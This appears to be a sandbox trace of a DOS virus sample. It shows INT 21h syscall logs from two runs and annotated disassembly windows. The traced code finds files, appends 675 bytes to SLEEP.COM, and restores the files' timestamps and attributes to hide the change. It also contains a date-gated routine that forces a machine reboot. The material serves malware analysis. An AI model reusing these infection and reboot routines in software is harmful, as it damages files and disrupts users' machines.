2018-12-25T11:59:44.327364082Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.330394653Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.339055326Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.356284066Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.358451514Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.366220911Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.37373531Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.375936543Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.381103234Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.38624242Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.389297612Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.391180707Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.393934718Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.411408816Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.414299806Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.416532278Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.42184201Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.425931822Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.435292281Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.4400283Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.442990676Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.453810988Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.461082704Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.465221671Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.4722198Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.47417116Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.484747724Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.487153991Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.496348558Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.508047172Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.511757532Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.516174767Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.521172434Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.523965339Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.531009986Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.53572961Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.537974191Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.539729167Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.542303264Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.552620075Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.554771833Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.564282137Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.575896312Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.578968469Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.583205548Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.588032782Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.589948481Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.59163808Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.594582376Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
; Disassembly window captured at PC 0x12ac6, where the trace logs INT 21h
; function 42 (0x2A, "Get date"); the compare on AL at 0x12ac6 is on the trace
; line just above. Two paths follow: a date-gated machine reset
; (0x12acf-0x12ada) and the clean-up path at 0x12ae0. The next call the trace
; logs is at PC 12ae9, so the clean-up path is the one taken in this run.
0x12ac8: jne 0x12ae0                     ; AL (day of week from Get date, 0 = Sunday) is not 4 (Thursday): skip the reset path
0x12aca: cmp dh, 0xe                     ; DH is the month after Get date
0x12acd: ja 0x12ae0                      ; unsigned DH > 14 skips the reset; NOTE(review): a month never exceeds 12, so this test cannot skip — the day in DL may have been intended; confirm
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax                      ; DS = 0x0040, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0          ; clears the word at 0040:0072, the BIOS reset flag (0x1234 there requests a warm boot)
0x12ada: ljmp 0xffff:0                   ; far jump to FFFF:0000, the processor reset entry point: the machine reboots
0x12adf: retf                            ; follows an unconditional far jump; reached only if something outside this window branches here
; Clean-up path.
0x12ae0: mov ax, 0x2524                  ; AH=0x25 set interrupt vector, AL=0x24: the DOS critical-error handler vector
0x12ae3: lds dx, ptr [bp + 0x446]        ; DS:DX = far pointer stored at bp+0x446 — presumably the handler address saved by the earlier Get interrupt vector call (trace PC 12a8e); confirm
0x12ae7: int 0x21                        ; the trace logs this as Interrupt = '36': 36 decimal is 0x24; its "Set random record number" gloss is the name of INT 21h function 0x24, not of this vector
0x12ae9: push cs
0x12aea: pop ds                          ; DS = CS again after lds replaced it
0x12aeb: lea dx, word ptr [bp + 0x3c2]   ; DS:DX = buffer at bp+0x3c2 — presumably the directory saved by the earlier Get current directory call; confirm
0x12aef: mov ah, 0x3b                    ; AH=0x3B change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80                    ; offset 0x80 — presumably the default DTA inside the PSP; confirm
0x12af6: call 0x12c4b                    ; target outside this window; the trace logs "Set disk transfer address" at PC 12c4f right after
0x12af9: cmp sp, 0x4b50                  ; window ends here; what this compare guards is not visible
2018-12-25T11:59:44.596722475Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.597757223Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.599135961Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.202704393Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.204592574Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.206169426Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.207910424Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.210184426Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.213981252Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.221067228Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.231906309Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.238336935Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.241271254Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.260364096Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.266971221Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.273749803Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.275101548Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Disassembly window captured at PC 0x12c1b, where the trace logs INT 21h
; function 44 (0x2C, "Get time"); the compare on DH at 0x12c1b is on the trace
; line just above. The window starts mid-routine and ends one instruction into
; the code at 0x12c4b.
; Analyst note: the file's date/time stamp is set from stored values before
; the handle is closed, so a modification time cannot be trusted as evidence
; that a file was left untouched; compare content or size instead.
0x12c1e: je 0x12c17                      ; DH == 0 (DH is the seconds field after Get time): branch back to 0x12c17, outside this window — presumably re-reads the clock until DH is non-zero
0x12c20: mov byte ptr [bp + 0x3a5], dh   ; keep the non-zero DH in the byte at bp+0x3a5; its later use is not visible here
0x12c24: call 0x12c9d                    ; target outside this window; the trace logs a 675-byte write at PC 12cf9 right after this point — presumably made inside that routine
0x12c27: mov ax, 0x5701                  ; AH=0x57, AL=0x01: set file date and time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]   ; time word — presumably the value saved before the file was modified; confirm
0x12c2e: mov dx, word ptr [bp + 0x41a]   ; date word, same caveat
0x12c32: int 0x21
0x12c34: mov ah, 0x3e                    ; AH=0x3E close file handle
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]   ; CX = zero-extended byte at bp+0x417 — presumably the saved attribute byte; confirm
0x12c3e: call 0x12c5a                    ; target outside this window; the trace logs "Get or set file attributes" at PC 12c63 right after the close
0x12c41: ret
; Separate entry after the ret above (presumably a helper): move file pointer with a zero offset.
0x12c42: mov ah, 0x42                    ; AH=0x42 move file pointer; AL (seek origin) is whatever the caller set
0x12c44: xor cx, cx
0x12c46: xor dx, dx                      ; CX:DX = 0 offset
0x12c48: int 0x21
0x12c4a: ret
; Next entry: only its first instruction falls inside the window.
0x12c4b: mov ah, 0x1a                    ; AH=0x1A set disk transfer address; the trace logs that call at PC 12c4f
2018-12-25T11:59:44.277626173Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.286985791Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.288341502Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.296144785Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.306667076Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.309472113Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.316001789Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.322893219Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.325372065Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.335135968Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.342676522Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.345964843Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.34737429Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.350590863Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.358916462Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.360633553Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.368583794Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.378591058Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.381272684Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.387946843Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.395728594Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.397436968Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.407287631Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.41509952Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.418065399Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.419690508Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.423052856Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.431225076Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.432898541Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.441089477Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.450641515Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.453356512Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.46179708Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.468335375Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.470359626Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.480780044Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.487496904Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.490437005Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.492426206Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.494816Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.503003585Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.504909255Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.512337345Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.522247179Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.5252757Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.531944497Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.537980804Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.540561049Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.544772542Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.549211255Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.552433038Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.554109462Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.556580864Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.570865637Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.572734143Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.574659388Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.579391846Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.5830579Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.590356983Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.59665872Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.599101774Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.608479657Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.614785765Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.617752274Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.619034751Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.621237271Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.630078006Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.631717486Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.639137925Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.652552668Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.654975749Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.66121715Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.66781925Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.669472071Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.679011884Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.685678672Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.688312576Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.689476773Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.692008955Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.70006041Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.7013467Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.708889516Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.718694506Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.72107498Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.727685772Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.731604506Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.732940771Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.736117328Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.739953093Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
; Disassembly window captured at PC 0x12ac6, where the trace logs INT 21h
; function 42 (0x2A, "Get date"); the compare on AL at 0x12ac6 is on the trace
; line just above. Two paths follow: a date-gated machine reset
; (0x12acf-0x12ada) and the clean-up path at 0x12ae0. The next call the trace
; logs is at PC 12ae9, so the clean-up path is the one taken in this run.
0x12ac8: jne 0x12ae0                     ; AL (day of week from Get date, 0 = Sunday) is not 4 (Thursday): skip the reset path
0x12aca: cmp dh, 0xe                     ; DH is the month after Get date
0x12acd: ja 0x12ae0                      ; unsigned DH > 14 skips the reset; NOTE(review): a month never exceeds 12, so this test cannot skip — the day in DL may have been intended; confirm
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax                      ; DS = 0x0040, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0          ; clears the word at 0040:0072, the BIOS reset flag (0x1234 there requests a warm boot)
0x12ada: ljmp 0xffff:0                   ; far jump to FFFF:0000, the processor reset entry point: the machine reboots
0x12adf: retf                            ; follows an unconditional far jump; reached only if something outside this window branches here
; Clean-up path.
0x12ae0: mov ax, 0x2524                  ; AH=0x25 set interrupt vector, AL=0x24: the DOS critical-error handler vector
0x12ae3: lds dx, ptr [bp + 0x446]        ; DS:DX = far pointer stored at bp+0x446 — presumably the handler address saved by the earlier Get interrupt vector call (trace PC 12a8e); confirm
0x12ae7: int 0x21                        ; the trace logs this as Interrupt = '36': 36 decimal is 0x24; its "Set random record number" gloss is the name of INT 21h function 0x24, not of this vector
0x12ae9: push cs
0x12aea: pop ds                          ; DS = CS again after lds replaced it
0x12aeb: lea dx, word ptr [bp + 0x3c2]   ; DS:DX = buffer at bp+0x3c2 — presumably the directory saved by the earlier Get current directory call; confirm
0x12aef: mov ah, 0x3b                    ; AH=0x3B change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80                    ; offset 0x80 — presumably the default DTA inside the PSP; confirm
0x12af6: call 0x12c4b                    ; target outside this window; the trace logs "Set disk transfer address" at PC 12c4f right after
0x12af9: cmp sp, 0x4b50                  ; window ends here; what this compare guards is not visible
2018-12-25T11:59:44.741831716Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.74353328Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.745205971Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.238569268Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.240068292Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.241726161Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.243172819Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.245631697Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.24988672Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.257036472Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.261992608Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.267276089Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.268952387Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.284652129Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.291480574Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.293940964Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.295713439Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Disassembly window captured at PC 0x12c1b, where the trace logs INT 21h
; function 44 (0x2C, "Get time"); the compare on DH at 0x12c1b is on the trace
; line just above. The window starts mid-routine and ends one instruction into
; the code at 0x12c4b.
; Analyst note: the file's date/time stamp is set from stored values before
; the handle is closed, so a modification time cannot be trusted as evidence
; that a file was left untouched; compare content or size instead.
0x12c1e: je 0x12c17                      ; DH == 0 (DH is the seconds field after Get time): branch back to 0x12c17, outside this window — presumably re-reads the clock until DH is non-zero
0x12c20: mov byte ptr [bp + 0x3a5], dh   ; keep the non-zero DH in the byte at bp+0x3a5; its later use is not visible here
0x12c24: call 0x12c9d                    ; target outside this window; the trace logs a 675-byte write at PC 12cf9 right after this point — presumably made inside that routine
0x12c27: mov ax, 0x5701                  ; AH=0x57, AL=0x01: set file date and time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]   ; time word — presumably the value saved before the file was modified; confirm
0x12c2e: mov dx, word ptr [bp + 0x41a]   ; date word, same caveat
0x12c32: int 0x21
0x12c34: mov ah, 0x3e                    ; AH=0x3E close file handle
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]   ; CX = zero-extended byte at bp+0x417 — presumably the saved attribute byte; confirm
0x12c3e: call 0x12c5a                    ; target outside this window; the trace logs "Get or set file attributes" at PC 12c63 right after the close
0x12c41: ret
; Separate entry after the ret above (presumably a helper): move file pointer with a zero offset.
0x12c42: mov ah, 0x42                    ; AH=0x42 move file pointer; AL (seek origin) is whatever the caller set
0x12c44: xor cx, cx
0x12c46: xor dx, dx                      ; CX:DX = 0 offset
0x12c48: int 0x21
0x12c4a: ret
; Next entry: only its first instruction falls inside the window.
0x12c4b: mov ah, 0x1a                    ; AH=0x1A set disk transfer address; the trace logs that call at PC 12c4f
2018-12-25T11:59:44.298247372Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.307028635Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.309138875Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.31657361Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.3291998Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.33254372Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.339105389Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.34543829Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.347660788Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.357863311Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.364229528Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.367143564Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.368919834Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.371729423Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.380237051Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.38258077Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.39084125Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.400800827Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.404875055Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.411720253Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.418181459Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.420764662Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.430669865Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.437376627Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.44129209Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.442713055Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.445315056Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.454741791Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.456455723Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.464788391Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.474985124Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.477547791Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.484092769Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.491397953Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.493559355Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.503732504Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.511514405Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.514466121Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.516151077Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.519598588Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.52837465Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.529945815Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.538727896Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.548471984Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.551102988Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.558242855Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.573627885Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.575401479Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.581290437Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.590799611Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.593272903Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.594771006Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.597863091Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.608033837Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.609461205Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.611606827Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.61575609Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.621966181Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.629527794Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.635832889Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.637446822Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.647693473Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.660777869Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.663417117Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.665637674Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.667917443Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.676491167Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.678429662Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.685778235Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.695213894Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.70713714Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.713543603Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.719522565Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.722266469Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.731784204Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.738070736Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.741071735Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.742256108Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.744526878Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.753088125Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.754367281Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.761599724Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.771947455Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.774447617Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.780638812Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.787492691Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.789213463Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.791754006Z 59 PC: 12ac0 | Change current directory
; Disassembly window after the INT 21h AH=2Ah (Get date) call logged at PC 12ac6:
; a date check, a reboot branch, and the clean-up path that the logged run follows.
; For AH=2Ah DOS returns AL = day of week (0 = Sunday), DH = month, DL = day.
; In this run the next logged call is Set interrupt vector at PC 12ae9, so the
; reboot branch (0x12acf-0x12ada) was not taken.
; NOTE(review): bp-relative operands look like the sample's data area addressed
; through a base kept in bp; bp is set outside this window -- confirm.
2018-12-25T11:59:44.79672088Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; day of week == 4 (Thursday)?
0x12ac8: jne 0x12ae0    ; other weekday -> clean-up path
